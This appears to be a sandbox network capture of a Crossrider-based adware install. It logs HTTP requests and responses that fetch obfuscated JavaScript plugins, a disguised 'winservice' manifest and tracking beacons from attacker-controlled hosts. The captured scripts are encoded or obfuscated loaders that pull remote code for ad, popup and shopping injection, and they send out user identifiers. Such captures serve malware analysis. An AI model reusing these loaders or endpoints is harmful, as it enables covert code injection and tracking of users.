    MDYwNzQ4MTcwZTE5NWUxMTBmMDExYzRiMDUxZTEyNWIxMjE2MTQwMTFjNGEwYzA3NWUxNT
    E3MDQzMzAyMGI1OTU3NDU1NTQxNTcxMTE5MDkwZTAyMDAyYjA4MTA0YzNkMzMyODNkMmIz
    NTI3MzMzZDM1MjczZTM0MmEzYzMyMzEyZjMwMzQyNjMzMzgzYTI2MzkzZDI1MmIyZTQ0MW
    YwOTFkMDUwODEwNWMyYjJlMjEzZTI0M2MzNzM0M2QyNTMxMjMzZDJkM2IzZjNiMjgzNTJj
    MzEyZTNkNGU0NzY1NDQ0NjU0NDE1NjE5MTYxODFiMWMzMTE0MTg0MzRlNTE0MDA0MWYxYj
    E0MTU0ZTRlNWIxMjA4MWY0NTAzMGQwODFmMDMxYjFkMGIwZjQ1MGMwYjBiNWIxMjE3MWIx
    MTQzMDgwNTE3NDkxNzE1MGMxYjExNDIwMTFjNWIwNzEyMDcyYjE4MDY1MTVhNWU1MDUzNT
    IxMjAxMTMwMzBhMGQzMDBkMDI0OTNlMmIzMjMwMjMzODNjMzYyZjMwMjQyNjJlMjczNDNm
    MmEyYTIyMzEyNTJiMjIzNzJlMzQyNjIwMzkyYjQ3MDcxMzEwMGQwNTBiNTkzOTJiMjIyNj
    NlMzEzZjM5MjYyMDIzMjYzZTM1MjEzMjMzMjUyZTI5MjMyYjNlNTY1ZDY4NGM0YjRmNDQ0
    NDA0MGQwMTE2MGIwMjIyMGI0NjVjNTQ1MzQzNDI2ODEx', 'atqblkodft'); }
    ....


    GET /plugins/mins/311.js?ver=4&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1434015478"
    Last-Modified: Thu, 11 Jun 2015 09:37:58 GMT
    Cache-Control: max-age=900
    Content-Length: 1055
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop006.fr7.t,1456422148.cds062.fr7.c
    if (typeof setup2 === 'function') { setup2('MWE3NDZlNDM0NTUxNTE0OTFlMW
    UxNTA5MzExMTA5NTM0YjRiNTQwMjE1MGQxNDU5NGE1ZTE4NDUxNTE4MDMxZjA5MDAwZjAy
    NWYwMjE4MGMwZTU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYT
    ViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0Mzky
    OTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMD
    A0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5
    MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1Mz
    Q3N2I2MDQxNTk0NDQzNDcxOTA1MWYwNjE5MzQwYjA4NDE1ZjUxNTMwMzAyMWUxMTBhNWU0
    YzRhMTgyZTA4MDQwODA3MTQwNzA5MTYyZTE4MDUxMDA1NGYwZDA4MTAwNjE1MWY0NTE1MD
    UwYzU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEw
    MWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZD
    IxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQz
    NTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2
    EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQx
    NTk0NDQzNDcwMTFkMWUxMTAzMGYzMDAwNDE1ZjUxNDI1YTQ3Njc2YjA0', 'aydceqqkvj
    '); }    ....


    GET /plugins/mins/380.js?ver=1&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1424181436"
    Last-Modified: Tue, 17 Feb 2015 13:57:16 GMT
    Cache-Control: max-age=582
    Content-Length: 1303
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop006.fr7.t,1456422148.cds004.fr7.c
    if (typeof setup2 === 'function') { setup2('MWE3Mzc4NDcwMTE3MWUxNjJkMG
    EwZDViNGI0NTRiMGIxZTEyMDg0MjRlNTYxMjAxMDc0ZDBkMDkwYjExMDYxNzAyMDAxYjE1
    NDQwNTE3MTU0ZTFhMTI0YTA4NGQwMDE1NDcyNzNlMGEwMzA2MzYwZjA1MDUxOTBjMGUwYj
    JlM2E1NDAwMDk0NDU0NzI2ODViMTkxMTFkMTMxOTMzMGExNDQzNDM1MTQ3MDExNzFlMTYw
    YjQyNGU1NjE1NTcwODViMGI1MjA5NDE0ZjBhMDIwOTQ3MGIxZDA1MWMxNjRmMTcxNDExND
    YwMDA5NDkxOTU2MGIwYTRlM2EzNjEwMTgwNTI3MTQwZTFhMTAxMTA2MTEzNTM5NDUxYjAy
    NWI1ZDZmNjA0MTFhMGEwZDFmMDgxNzM4MDE0YjU5NGE1NTQwNDg0ZDczNTE0NTQ5NDM0OD
    BmMTYxNDA4MTcxNDJmM2E0MTUwNDY1YTBmMDgxNzE1MGExZTRkMzUzOTE2MGMwNzI2MTgw
    NzAwMDAzNTM5NDU1ZjNlMjYzMjM3MjYzMDM5MzQzMTNjMjQyYjJlMmMyNzMwM2UyNzM0Mz
    QyNDJiMmUzMDNhMjYzODM5MzEzYzNlMjY1NjVlMWUwYTA0MDIxNzBmNGYyNjJlMGIxZDA1
    MzUxMDFkMGEwODI2MmU1ODRlM2MzNTI1MmEzNzMyMmEyMzJjMmQyNjM4MzkyZTNkMzMzMD
    M3MmMyYzMxMzUzOTVmNDMxNjEwMWYwMTA2MTQ0NDM5MjcxNjE1MWYyZTA3MWIzYzM1NWI1
    ZjI3M2UzYTIzMmEzYTMwMzgyZjNjM2QzMzI2MzMzNzI2MzQzOTIzMmEyNzNlNWU0YTEyMD
    AwZDBlMDkwZjU2M2UyNjFmMTEwZjNjMDkwYjA4MjczZTQ0NTYzYTM2MjAzODI5MmIyYjMz
    MzAzNTIwM2IzYzI5MjczNTI4M2UzMDM1M2EzNjQ0NTExMTExMTYwNTE2MDY0YjM2M2MwND
    EyMWUyNzA2MWMxZTNhMzY1ZTRkMzkyNzNiMzMzNjIyMzYzYjJhMmUyMzJhMjcyMjM2MjQy
    YjNkMzEzMzM5M2IzNzI1M2MyZTNhNGU1ODFkMGYxNjFjMGUwZTVmM2EzNjBkMWUwMDI3MT
    YwMDE0MTQzYTM2NWU0ZDM5MjczYjMzMzYyMjM2M2IyYTJlMjMyYTI3MjAyOTIxM2EyNzIy
    MjcyMzI3Mjc0NjQyNTM2ZjE0', 'ayqeicjfxx'); }    ....
    <<< skipped >>>

    GET /plugins/mins/184.js?ver=11&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420026483"
    Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT
    Cache-Control: max-age=900
    Content-Length: 1231
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop006.fr7.t,1456422148.cds027.fr7.c
    if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMW
    QxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFm
    NWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyOD
    FkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0
    OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMz
    YwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFj
    NWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyND
    A4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2Mz
    NDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NG
    Q0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQy
    MTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNT
    Q0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0
    OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMD
    cxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0
    M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjAzODM3MmUzNDI0MjYyNTQwMzgxZj
    A4MTUwZDE4MTMzMDFlNWIzMzJmMjQyYjIwMmEzMjJiMzMyMjI5MjIzODNjMzcyZDI0Mzcz
    ZTIzMjgyZjM0MmMyZDI2MjgzZDI1Mzk0ZTVjNmQ3MDRkMDkwZDBjMWQwZjAyMzkwMzViNT
    U1OTUwNDE0ZTZjMTE3YQ==', 'yayzflpgyo'); }    ....
    <<< skipped >>>

    GET /plugins/mins/102.js?ver=15&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1426423396"
    Last-Modified: Sun, 15 Mar 2015 12:43:16 GMT
    Cache-Control: max-age=900
    Content-Length: 1023
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop006.fr7.t,1456422148.cds035.fr7.c
    if (typeof setup2 === 'function') { setup2('MDM3YTU0NTU1NTU1NDYxODFmMW
    EwODI1MDYxOTU3NGY0NDUyMDMxYTBjMDA0ZTVhNWExYzRhMTMxOTBjMGIxYTA3NWIxYzFi
    MDIxZjQ0MGQwYTEyMTI1YTFmMTQxMjExMTgwZDBhMTkwNDAxNWIxZjE3NGYwODA2MTkxZT
    FhMTAxOTQ4MDcwMjBmMWMyNzJmMmIzNjI3M2EzNzIzMzkyNzNjMzUyNjJhMzAyZDMwMzUy
    NTJhM2QzNDJiMjYyMDM3M2IzOTJmMzEyNzU2MTUwNTA1MjEwZDA0MDcwYjQ1MmYyYjM2Mj
    czYTM3MjMzOTI3M2MzNTI2MmEzNDI1MzQyZjI1MmYzNTM1MmIyYTUzMWQwZDE0NTYzMTI3
    MzMyNjNhMjYyNjM2MzkyZjJiMmEyZjIxMjYzMDI3M2IzOTJmMzEyNzUyNTg3ZjU1NTU0ND
    UwNDkwNjBjMDQwNDA2MjAwNzA4NTI1MTRlNWExODAwMDEwNTA2NWU1ZjQ0MDcyNzEzMDYx
    NzA2MWYxNzJmMDIwMDFlMWY1YTAxMTkwNjA3MTQwNTQwMWIxZjE5NWExNjA3MDYxNjQ0MD
    QxOTA2MTUwNjE2MDcwZDAwMWY0MDEyMDM0YjE2MWQxNDBhMWUwZTAyNDUxMzA2MTEwNzJh
    M2IyZjI4M2MzNzIzMjcyNzNjMzEyMTIyMzQyYjIwMjQzMTNiMzEzMDIwMmYzODNiM2EyZj
    NkMzEyYTJhNDIxMTFiMWUyYzE5MDAxOTEwNDgzYjJmMjgzYzM3MjMyNzI3M2MzMTIxMjIz
    NDJmMjgyMDJiM2IzNDM4MjEyZjM0NDgxMDE5MTA0ODJhMmEyNzIyMjQzZDJiMjIzZDMxMz
    AyNzNiMjUzODJiMmEyZjNkMzEyYTJhNDY1YzYxNGU1ODUwNTQ1NzA1MTkxMTE3MDIwMDMx
    MTQ1NjRmNTU0NDU0NDI2MTEz', 'xptuuudpkn'); }    ....


    GET /plugins/mins/376.js?ver=12&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1450608516"
    Last-Modified: Sun, 20 Dec 2015 10:48:36 GMT
    Cache-Control: max-age=437
    Content-Length: 11146
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422149.dop006.fr7.t,1456422148.cds012.fr7.c
    (function(){var a=(function(){var l=function(){return appAPI&&appAPI.i
    nstaller&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?
    appAPI.installer.getAdditionalInfo():null;};var j={ie:"10",ni:"11",te:
    "19",ch:"20",to:"26",sb:"27",op:"28",tc:"29",ff:"30",tf:"39",sf:"40",n
    v:"50",ms:"51",mf:"52",mc:"53",np:"54",sm:"55",fm:"56",cm:"57",mx:"60"
    };var p="source_id";var k="776";var e="__PageActive__";var q=new Date(
    2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.insta
    ller&&typeof appAPI.installer.getUnixTime==="function")?appAPI.install
    er.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[
    {pluginId:288,httpUrl:"hXXp://istatic.eshopcomp.com/fo/min/crqc.js?hid
    =__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRID
    ER_EXTENDED_SUB_ID__",httpsUrl:"hXXps://istatic.eshopcomp.com/fo/min/c
    rqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=
    __CROSSRIDER_EXTENDED_SUB_ID__",delay:0},{pluginId:242,httpUrl:"http:/
    /inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER
    _ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP
    _NAME__",httpsUrl:"hXXps://inst.shoppingate.info/js/sg_bg.js?AFFILIATE
    _ID=crsrdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DIS
    PLAY_NAME=__CROSSRIDER_APP_NAME__",delay:0},{pluginId:385,httpUrl:"htt
    p://api.jollywallet.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXT
    ENDED_SUB_ID__&name=__CROSSRIDER_APP_NAME__",httpsUrl:"hXXps://api.jol
    lywallet.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_S
    <<< skipped >>>

    GET /plugins/mins/354.js?ver=2&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1418039174"
    Last-Modified: Mon, 08 Dec 2014 11:46:14 GMT
    Cache-Control: max-age=535
    Content-Length: 122978
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422149.dop006.fr7.t,1456422148.cds054.fr7.c
    __CTG_MAPPING__={"1":["d908e50170d7cb46a92fdbff0d73bb5d","0a64c8127573
    2dcf0eb51fc0fdecfaa7","edb18644366c10cc24c58f6fb14ca9f4","15e39ed909ac
    8e17ae3cc3c91cd7ae9f","dccefc9affe37ba60b49d0a4789ce042","55a7d0f38334
    87778c3bdff8b2096e93","0212ae9fc1eeb53f9f641335b804d75e","d5e783fe22ab
    e91aae7179d10a958497","9c8a818246bc677ef54725340e9c5a98","6871592501ed
    31709e241750c4363fce","1c5e3f677b22b8257c1df15a70e7df26","daf4c4488123
    ddadb30a7adaadb18b54","11fbd0aa23a016619379552c438b081a","fcaed5b82116
    cd700a0949772ad8ff49","6ac10c5f77cf4309c731a1edca41f357","5c83bc2a9fe1
    1b248ee7a0577c7d8fdd","b4724ce8e3ac8d971ea648c70f1f3a28","5cfdb867e963
    74c7883b31d6928cc4cb","5bc25469aea12b844db6b49146c3e0ed","15830c2f3218
    394a63d70b23d235cc1c","7f5e73ea77ef99619089c3857dafdcb4","029c1c42a916
    0c3cf3db1a687f11ff72","e84400c002083678aa69041045895fae","da0239e7da03
    30fb26ef37dd1d940044","993439d6f7a4548cae1381c9073cbee1","24414caa6316
    a5694f77499fa604e5b1","340d70f50a7a4507bc874c8108bb45bc","2e44b2f1bf1b
    2b87d2be9f94ad2a2a35","5484845885ffd608ebb0ad1ac39434d4","96eb5194f361
    b233bf8fb9a80267f1de","91e4f116b8a4f5258b982d3c10910bdf","5638298177fc
    6af5190590244d6d8035","7712b7ac7ec5d5966fb35b1425d0283f","1080cee006e8
    4c91858613ce7dde99fb","428d0f3d623a15db6cacb689e86b4352","8b25ca5c09e1
    0312a1567fb3d7f82c07","84dcb17eaafb9d32908759a607838c8b","fcbed3a6b1e5
    92c8efddf3f925b26b7f","7eae142b683afcf5aee231291c679877","9bcd814058bc
    f8f6497f0495e0a2fd71","6bb8719fca4581212b3aa47da8755163","adb2121658b6
    9c9a701f270c8faba02f","5694f231cd01d8222d59557c56cef9a7","b7444e18
    <<< skipped >>>

    GET /plugins/mins/345.js?ver=47&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:29 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1450797163"
    Last-Modified: Tue, 22 Dec 2015 15:12:43 GMT
    Cache-Control: max-age=900
    Content-Length: 781
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422149.dop006.fr7.t,1456422149.cds047.fr7.c
    __INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,
    170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,26
    4,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,
    368,372,374,379,387,388,393,399,408,410,413,415,416,418,421,424,437,44
    6,452],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,2
    78,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357
    ,358,390,396,401,423,436,439,440,450,459],intext:[103,117,123,142,259,
    263,342,359,360,391,402,442],shopping:[92,93,102,104,117,124,128,138,1
    84,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256
    ,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,3
    50,351,369,370,371,375,385,389,397,409,411,412,414,419,441,443,444,451
    ,453,457]};    ....


    GET /plugins/mins/246.js?ver=17&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:29 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1424173488"
    Last-Modified: Tue, 17 Feb 2015 11:44:48 GMT
    Cache-Control: max-age=682
    Content-Length: 7448
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422149.dop006.fr7.t,1456422149.cds059.fr7.c
    var _0x8f59=["10","11","19","20","26","27","28","29","30","39","40","5
    0","51","52","53","54","55","56","57","60","installer","getAdditionalI
    nfo","isFunction","utils","isDefined","asw","isArray","length","toLowe
    rCase","platform","np","ni","browser_name","__BROWSER_NAME__","getIds"
    ,"installer_verifier","","string","charCodeAt","replace","match","appl
    y","fromCharCode","Base64","decode","call","parse","JSON","monetizatio
    n","internal","plugins","un","def","ined","pluginId","getExtendedSubId
    ","function","slice","getSubId","getTime","_","join","na","httpUrl","_
    _RND__","g","__ADVANCE_USER__","__CROSSRIDER_ASW__","__CROSSRIDER_INST
    ALL_TIME__","getUnixTime","__CROSSRIDER_COUNTRY_CODE__","getCountry","
    __CROSSRIDER_EXTENDED_SUB_ID__","__CROSSRIDER_USER_ID__","userId","app
    Info","__CROSSRIDER_VERIFIER__","__CROSSRIDER_INSTALLER_USER_ID__","ge
    tUserId","__CROSSRIDER_APP_ID__","appID","__CROSSRIDER_BROWSER__","__C
    ROSSRIDER_CAMP_ID__","getCampaignId","__CROSSRIDER_LIGHT_SUB_ID__","__
    CROSSRIDER_APP_NAME__","name","__CROSSRIDER_SUB_ID__","httpsUrl","inli
    neJS","waitForBodyReady","undefined","addRemoteJS"];setup2=function(m,
    k){var h={ie:_0x8f59[0],ni:_0x8f59[1],te:_0x8f59[2],ch:_0x8f59[3],to:_
    0x8f59[4],sb:_0x8f59[5],op:_0x8f59[6],tc:_0x8f59[7],ff:_0x8f59[8],tf:_
    0x8f59[9],sf:_0x8f59[10],nv:_0x8f59[11],ms:_0x8f59[12],mf:_0x8f59[13],
    mc:_0x8f59[14],np:_0x8f59[15],sm:_0x8f59[16],fm:_0x8f59[17],cm:_0x8f59
    [18],mx:_0x8f59[19]},i=function(){return appAPI[_0x8f59[20]]&&appAPI[_
    0x8f59[23]][_0x8f59[22]](appAPI[_0x8f59[20]][_0x8f59[21]])?appAPI[
    <<< skipped >>>
    

    GET /plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:26 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1456422146"
    Last-Modified: Thu, 25 Feb 2016 17:42:26 GMT
    Cache-Control: private, must-revalidate, max-age=0
    Content-Length: 1681
    Content-Type: application/xml; charset=utf-8
    X-HW: 1456422146.dop001.fr7.t,1456422146.cds047.fr7.p
    <?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>.  <V
    er>151</Ver>.  <ShortName>winservice86</ShortName>
    ;.  <Description>winservice</Description>.  <PublisherN
    ame>Corporate Inc</PublisherName>.  <HomePageLink>NA<
    ;/HomePageLink>.  <JSLink>hXXp://js.newcloudrack.com/plugin/a
    pps/64755/js/na/ie/app_code.js</JSLink>.  <GroupID>0</G
    roupID>.  <Domain>NA</Domain>.  <RunInIframe>fals
    e</RunInIframe>.  <ThanksURL>NA</ThanksURL>.  <Em
    ailSignature>NA</EmailSignature>.  <SettingsURL>NA</
    SettingsURL>.  <CertifiedInstall>NA</CertifiedInstall>.
      <ExposeSites>NA</ExposeSites>.  <RemoteFBApiURL>NA
    </RemoteFBApiURL>.  <DisableIE>true</DisableIE>.  &l
    t;DisableFF>true</DisableFF>.  <EnableSearchIE>false<
    ;/EnableSearchIE>.  <EnableSearchFF>false</EnableSearchFF&
    gt;.  <AddressbarIE>NA</AddressbarIE>.  <AddressbarFF&g
    t;NA</AddressbarFF>.  <AddressbarFFEnhanced>NA</Address
    barFFEnhanced>.  <AddressbarCR>NA</AddressbarCR>.  <
    NewTabURL>NA</NewTabURL>.  <NewTabEmbed>NA</NewTabEm
    bed>.  <OpenSearchURL>NA</OpenSearchURL>.  <Backgrou
    ndJS>hXXp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.
    js</BackgroundJS>.  <BackgroundVer>17</BackgroundVer>
    ;.  <Manifest>NA</Manifest>.  <ChangePrevious>fa
    <<< skipped >>>
    

    GET /stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481 HTTP/1.1
    Accept: */*
    Host: stats.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: DlPZOvBoJzIz/WFxryltbeCWhjeZWYMKP8KB2vlHmB8ORsxqa5/niF5PGR1hgMPzu5Zh9zWShvk=
    x-amz-request-id: C02D4ECBCD887647
    Date: Thu, 25 Feb 2016 17:42:35 GMT
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate
    Last-Modified: Tue, 25 Feb 2014 00:06:38 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..

    

    GET /COMODOCodeSigningCA2.crl HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: crl.comodoca.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:22 GMT
    Content-Type: application/x-pkcs7-crl
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: __cfduid=d02ba43ed8f4a94da5de304b643a54a3b1456422142; expires=Fri, 24-Feb-17 17:42:22 GMT; path=/; domain=.comodoca.com; HttpOnly
    Last-Modified: Wed, 24 Feb 2016 21:13:33 GMT
    ETag: W/"56ce1cfd-11987"
    X-CCACDN-Mirror-ID: h6edcacrl9
    Cache-Control: public, max-age=14400
    CF-Cache-Status: HIT
    Expires: Thu, 25 Feb 2016 21:42:22 GMT
    Server: cloudflare-nginx
    CF-RAY: 27a534d5f171273e-FRA
    5ba7..0....0.......0...*.H........0{1.0...U....GB1.0...U....Greater Ma
    nchester1.0...U....Salford1.0...U....COMODO CA Limited1!0...U....COMOD
    O Code Signing CA 2..160224211333Z..160228211333Z0....0".........=...[
    ...<...110824203440Z0".....[..x.Ik.M..ud...110825114542Z0!..Y\7.o..
    .p......F..110825134216Z0!..*..d.. .D>Z...bH..110825235944Z0!..v...
    ..U...........110826180316Z0"......a...sj.........110827065611Z0"....g
    ..?R.G.=s.......110829195328Z0!..q.?@..|f..........110829205743Z0!..&l
    t;..=. :4.....|Sk..110830163519Z0"....3.>&.=.&.QB.z....110830195540
    Z0".....W...p.~.....0T..110901131432Z0!...c:6`....V ...}...11090113182
    3Z0".........<.....J.....110901152743Z0!..M....A...=...z.Z..1109011
    85932Z0".........b........y..110901212800Z0"....,..p.....;[email protected]
    2154630Z0".....8...b8..}.CO....110902175624Z0"....v.<u\...`....^...
    110902194811Z0!.. gR`..k}.0c....7..110902205032Z0"....#.y...}[.^.=.. .
    .110905122329Z0"....8l.q.x.....<..K..110905140709Z0!....=...oHF<
    v..O....110906095658Z0!..(..j.z5..p.....n..110906140412Z0"....=A.w.p..
    .........110907092516Z0!..5....r..R.a..4....110907092609Z0!.........D.
    .).^.'...110907092655Z0!..[....1............110907132010Z0".......3Ee.
    ...p-.....110908132554Z0!..A.v...GR..JJ)c.b..110909093345Z0"....b..T..
    ]..........110910043824Z0"....f.......T.V.N{9..110910044920Z0!..,.....
    .h.L.T.|.U..110912173144Z0"....-...D,.UM...O.V..110912173717Z0!.. b...
    ...f..j.p.^..110913094740Z0!..Jc...RX.lp!.......110913102919Z0!..R..A.
    z{~.X...B....110913165335Z0!..>......b|...Rw.g..110914090437Z0!
    <<< skipped >>>
    

    GET /plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:26 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1452026982"
    Last-Modified: Tue, 05 Jan 2016 20:49:42 GMT
    Cache-Control: max-age=900
    Content-Length: 617
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422147.dop015.fr7.t,1456422146.cds062.fr7.pr
    ..  /*****************************************************************
    *******************.  This is your Page Code. The appAPI.ready() code 
    block will be executed on every page load..  For more information plea
